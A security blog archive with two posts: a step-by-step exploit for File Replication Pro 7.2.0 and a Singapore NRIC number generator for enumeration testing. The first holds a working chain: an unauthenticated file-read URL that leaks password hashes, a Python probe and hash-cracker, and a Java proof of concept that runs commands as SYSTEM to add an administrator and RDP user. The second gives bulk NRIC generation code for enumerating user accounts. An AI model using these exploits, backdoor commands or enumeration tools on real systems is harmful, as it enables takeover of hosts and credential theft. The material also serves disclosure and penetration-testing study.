Category Archives: programming

Exploiting File Replication Pro 7.2.0

* The information found in this post is for educational purposes only and not to be used for illegal purposes *

Recently, a security advisory on the vulnerabilities found in File Replication Pro (FRP) 7.2.0 was released on this site. This post walks through the steps involved in remotely gaining SYSTEM-level access to a host that has this software installed. As of the date of this post, the trial version of FRP 7.2.0 is still available for download at http://www.filereplicationpro.com.

* Note: A quick search on shodan.io with the keywords “FRP Node Ready” shows quite a number of vulnerable systems out there. *

That aside, the first step is to install the software. We will be using a Windows 7 machine for this demonstration. After running the installer, a few services are added to startup, namely three ‘prunsrv.exe’ processes as shown below. Note that the services run under the NT AUTHORITY\SYSTEM account, so anything they can be made to execute runs with full SYSTEM privileges:

[screenshot frp1: the three prunsrv.exe services running as NT AUTHORITY\SYSTEM]

The unauthenticated remote command execution vulnerability lies in the way these processes handle password authentication: in the default configuration the replication RPC service accepts calls without any credentials, and its ExecCommand function runs the supplied command as NT AUTHORITY\SYSTEM. Using a browser, navigate to port 9200 on localhost, which is where the replication RPC service listens. You should see the following:

[screenshot frp2: browser view of port 9200 showing the “>> FRP Node Ready>> C24EB17AEF0D61>> OK” banner]

The “OK” at the end of the “>> FRP Node Ready>> C24EB17AEF0D61>> OK” output indicates that this RPC server does not require any form of authentication. This is the default behaviour of a vanilla install. If you see “ERROR” instead of “OK”, the RPC server is configured with a password and authentication is required. However, a second vulnerability in the software, an unauthenticated remote file read in the JSP application on port 9100, can be abused to retrieve that password hash. FRP's configuration, including the password hashes, can be read remotely and without authentication using the following link:

http://127.0.0.1:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml

You should see the password hash in the configuration.xml file. If more clients have been added to the FRP management server, all of their password hashes will be listed there as well. If you explore further, look into the .jar and .war files in the installation directory and work out how the software's RPC protocol works, you can then build a malicious RPC client. The one in this example adds an arbitrary user to the remote system and then adds that user to both the Administrators and Remote Desktop Users groups.
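As an added example (not code from the original post or from FRP), the following Python script automates the two checks described above: it parses the port-9200 banner to tell an open node from a password-protected one and, for the protected case, builds the configuration.xml disclosure URL and runs a dictionary check against the retrieved hash. The hash format, base64 of an unsalted SHA-1 of the password, is inferred from the sample pair quoted in the exploit's comments further down (12345 / jLIjfQZ5yojbZGTqxg2pY0VROWQ=), not from FRP documentation. The 28-character regex used to pick hashes out of the XML, the element names in the constructed sample XML, and the assumption that the service answers a plain HTTP GET with its banner are likewise mine.

```python
import base64
import hashlib
import re
import socket
import sys

# Constructed sample inputs: the banner is the one shown in the post; the hash is the
# "12345" example quoted in the exploit's comments; the XML is a made-up stand-in,
# since the post does not show FRP's real configuration.xml schema.
SAMPLE_BANNER = ">> FRP Node Ready>> C24EB17AEF0D61>> OK"
SAMPLE_HASH = "jLIjfQZ5yojbZGTqxg2pY0VROWQ="
SAMPLE_CONFIG = "<config><node><password>jLIjfQZ5yojbZGTqxg2pY0VROWQ=</password></node></config>"


def parse_frp_banner(text):
    """Parse the greeting of the replication RPC service on TCP/9200.

    The post shows it as '>> FRP Node Ready>> <node id>>> OK'; an ERROR in the
    last field means a password is configured. Returns None when the text does
    not contain an FRP banner (e.g. some unrelated HTTP response)."""
    idx = text.find("FRP Node Ready")
    if idx < 0:
        return None
    fields = [f.strip() for f in text[idx:].split(">>")]
    if len(fields) < 3 or not fields[1] or not fields[2]:
        return None
    status = fields[2].split()[0].upper()
    return {"node_id": fields[1], "status": status, "auth_required": status != "OK"}


def frp_password_hash(password):
    """Stored-password format: base64 of the unsalted SHA-1 of the password.
    Inferred from the 12345 / jLIjfQZ5yojbZGTqxg2pY0VROWQ= pair on this page."""
    digest = hashlib.sha1(password.encode("utf-8")).digest()
    return base64.b64encode(digest).decode("ascii")


def find_candidate_hashes(text):
    """Heuristic (assumption): pull out 28-character base64 blobs, the length of a
    base64-encoded SHA-1 digest, so no knowledge of the XML element names is needed."""
    return re.findall(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{27}=(?![A-Za-z0-9+/=])", text)


def recover_password(stored_hash, candidates):
    """Dictionary check. Unsalted SHA-1 means one hash per guess and the same
    precomputed table works against every node in the configuration file."""
    for guess in candidates:
        if frp_password_hash(guess) == stored_hash:
            return guess
    return None


def config_disclosure_url(host):
    """The unauthenticated file-read URL from the post, with the host substituted."""
    return r"http://%s:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml" % host


def grab_banner(host, port=9200, timeout=5.0):
    """Live check. Assumption: the service answers a plain HTTP GET with its banner,
    which is how the browser view in the post obtained it."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"GET / HTTP/1.0\r\nHost: " + host.encode("ascii") + b"\r\n\r\n")
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks).decode("latin-1")


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else None
    banner = grab_banner(host) if host else SAMPLE_BANNER
    info = parse_frp_banner(banner)
    if info is None:
        print("no FRP banner found")
    elif not info["auth_required"]:
        print("node %s: no authentication required" % info["node_id"])
    else:
        print("node %s: password set; fetch %s" % (info["node_id"], config_disclosure_url(host)))
    # Offline demonstration on the constructed sample config and a tiny wordlist.
    for h in find_candidate_hashes(SAMPLE_CONFIG):
        print(h, "->", recover_password(h, ["password", "admin", "12345"]))
```

Run with a host name to probe a live node, or with no arguments to exercise the parser and the hash check on the embedded samples.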

The following exploit code is used in this example. Remember to replace the IP, port, and password variables accordingly:

/**
 * @author Jerold Hoong (Vantage Point Security)
 * File Replication Pro <= v7.2.0
 * Remote Command Execution PoC Working Exploit
 * www.vantagepoint.sg
 * NOTE: Put the FRP libraries (the .jar/.war files from the installation directory) on the classpath to compile
 */

import java.util.HashMap;
import java.util.Map;
import net.diasoft.frp.engine.model.AddressPort;
import net.diasoft.frp.engine.tcp.client.RPCDriver;
import net.diasoft.frp.engine.tcp.client.TCPConnection;

public class Main {

    static String ip = "1.2.3.4";
    static int port = 9200; // FRP replication RPC service

    // The password can be retrieved through the remote file disclosure vulnerability (configuration.xml).
    // If no password is set, leave this as an empty string.
    // Use IE to navigate to :9200. OK = NO-AUTH, ERROR = AUTH
    static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=

    // Account created on the target; change as needed.
    static String newUser = "vantagepoint";
    static String newUserPassword = "LOLrofl1337!";

    /**
     * Calls the RPC function "ExecCommand". The value of the "COMMAND" parameter is
     * executed by the prunsrv.exe service, i.e. as NT AUTHORITY\SYSTEM. A null command
     * sends an empty parameter map and is used only to check that the RPC call path works.
     */
    static boolean execCommand(RPCDriver rpc, String command) {
        HashMap p = new HashMap(); // raw type, as expected by the FRP library in the original PoC
        if (command != null) {
            p.put("COMMAND", command);
        }
        try {
            rpc.callFunction("ExecCommand", p);
            return true;
        } catch (Exception e) { // RPCException, IOException or ClassNotFoundException
            e.printStackTrace();
            return false;
        }
    }

    public static void main(String[] args) {
        AddressPort ap = new AddressPort(ip, port);
        AddressPort[] addresses = {ap};
        TCPConnection tcpConnection;

        try {
            // The password is only checked when the node has one configured (banner shows ERROR)
            tcpConnection = new TCPConnection(addresses, password, true);
        } catch (Exception e) {
            e.printStackTrace();
            return;
        }

        System.out.print("Connecting to host...");
        RPCDriver rpc = new RPCDriver(tcpConnection);
        if (execCommand(rpc, null)) {
            System.out.print("Success!\n");
        }

        // add new user
        System.out.print("Attempting to add user '" + newUser + "' with password '" + newUserPassword + "': ");
        System.out.println(execCommand(rpc, "net user " + newUser + " " + newUserPassword + " /add") ? "OK" : "FAILED");

        // add new user to Administrators group
        System.out.print("Attempting to add user '" + newUser + "' to 'Administrators' group: ");
        System.out.println(execCommand(rpc, "net localgroup \"Administrators\" " + newUser + " /add") ? "OK" : "FAILED");

        // add new user to Remote Desktop Users group
        System.out.print("Attempting to add user '" + newUser + "' to 'Remote Desktop Users' group: ");
        System.out.println(execCommand(rpc, "net localgroup \"Remote Desktop Users\" " + newUser + " /add") ? "OK" : "FAILED");

        System.out.print("\n\n---- END ----\n\n");
    }
}

The following screenshot shows the list of users on the Windows 7 system, before the exploit code was executed:

[screenshot frp3: local user list before running the exploit]

After the exploit code was successfully executed:

[screenshots: exploit output, and the local user list after running the exploit]

If RDP is not enabled on the remote host, you can tweak the commands in the exploit to enable it. You should now be able to RDP to the box and access it as an Administrator.

Here is a video showing the exploit in action:

Update: After a long time, the FRP developers finally released a fixed version: https://frpsupport.fogbugz.com/default.asp?W291

[screenshot: FRP release announcement for the fixed version]

NRIC Number Generation

At times, my job requires the use of “valid” NRIC numbers to conduct certain security tests. There was a time last year when I needed a sample of approximately 5000 NRIC numbers for user-enumeration tests. I did a quick Google search and found a couple of online generators, but they were clunky and slow, and it would probably have taken ages to generate a sizeable sample. There was even this website, http://bit.ly/1ccZXvE, that stated: “If you need bulk generation of > 1000 NRIC numbers in any format, please contact me for a quote.” I wondered if this was even legal, so out of curiosity I requested a quotation with a dummy email account (see the email exchange below).

[screenshot: email exchange requesting a quotation for bulk NRIC generation]

Anyway, I would definitely not pay for stuff like this, and decided to do some research with a good buddy of mine (Joel) on the algorithm behind the generation. After a few minutes we found the publicly available algorithm online and wrote a simple generator. 5000 unique NRIC numbers were then generated in less than one second, at zero cost. S$30 saved. 🙂

[screenshot: output of the NRIC generator]

Now that the goodies are in a text file, it is easy to load them into Burp Intruder and enumerate away…
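The generator itself is not shown in the post, so here is an added Python version (mine, not the author's or Joel's) implementing the publicly documented NRIC check-digit algorithm: the seven digits are weighted 2, 7, 6, 5, 4, 3, 2, an offset of 4 is added for the T and G series, and the weighted sum modulo 11 selects the check letter from a per-series table. It also validates existing numbers, which is the check a login form typically runs before touching its user database. One caveat for the enumeration use case: a number passing this check is syntactically valid, not necessarily issued to anyone, so only the application's response tells you whether it belongs to a real account. The output file name and the default prefix are my choices.

```python
import random
import sys

# Weights applied to the seven digits, per the publicly documented NRIC check-digit algorithm.
WEIGHTS = (2, 7, 6, 5, 4, 3, 2)
# Check letter indexed by (weighted sum mod 11). S/T and F/G series use different tables.
CHECK_LETTERS = {
    "S": "JZIHGFEDCBA", "T": "JZIHGFEDCBA",
    "F": "XWUTRQPNMLK", "G": "XWUTRQPNMLK",
}


def nric_check_letter(prefix, digits):
    """Return the check letter for a prefix (S/T/F/G) and a 7-digit string."""
    if prefix not in CHECK_LETTERS or len(digits) != 7 or not digits.isdigit():
        raise ValueError("prefix must be S, T, F or G and digits must be 7 numerals")
    total = sum(w * int(d) for w, d in zip(WEIGHTS, digits))
    if prefix in "TG":  # the newer series add an offset of 4 before the modulo
        total += 4
    return CHECK_LETTERS[prefix][total % 11]


def is_valid_nric(nric):
    """Format check only: a True result says nothing about whether the number was issued."""
    nric = nric.strip().upper()
    if len(nric) != 9:
        return False
    prefix, digits, letter = nric[0], nric[1:8], nric[8]
    try:
        return nric_check_letter(prefix, digits) == letter
    except ValueError:
        return False


def generate_nrics(count, prefix="S", seed=None):
    """Generate `count` distinct, checksum-valid NRIC numbers for one series.
    random.sample over the 10-million digit space guarantees uniqueness without retries."""
    if prefix not in CHECK_LETTERS:
        raise ValueError("prefix must be S, T, F or G")
    rng = random.Random(seed)  # seed it for a reproducible sample
    out = []
    for n in rng.sample(range(10_000_000), count):
        digits = "%07d" % n
        out.append(prefix + digits + nric_check_letter(prefix, digits))
    return out


if __name__ == "__main__":
    count = int(sys.argv[1]) if len(sys.argv) > 1 else 5000
    numbers = generate_nrics(count)
    with open("nric.txt", "w") as f:  # one per line, ready for a Burp Intruder payload list
        f.write("\n".join(numbers) + "\n")
    print("wrote %d numbers to nric.txt, e.g. %s" % (len(numbers), numbers[0]))
```

S1234567D is the usual worked example: 2·1 + 7·2 + 6·3 + 5·4 + 4·5 + 3·6 + 2·7 = 106, and 106 mod 11 = 7, which indexes to D in the S/T table.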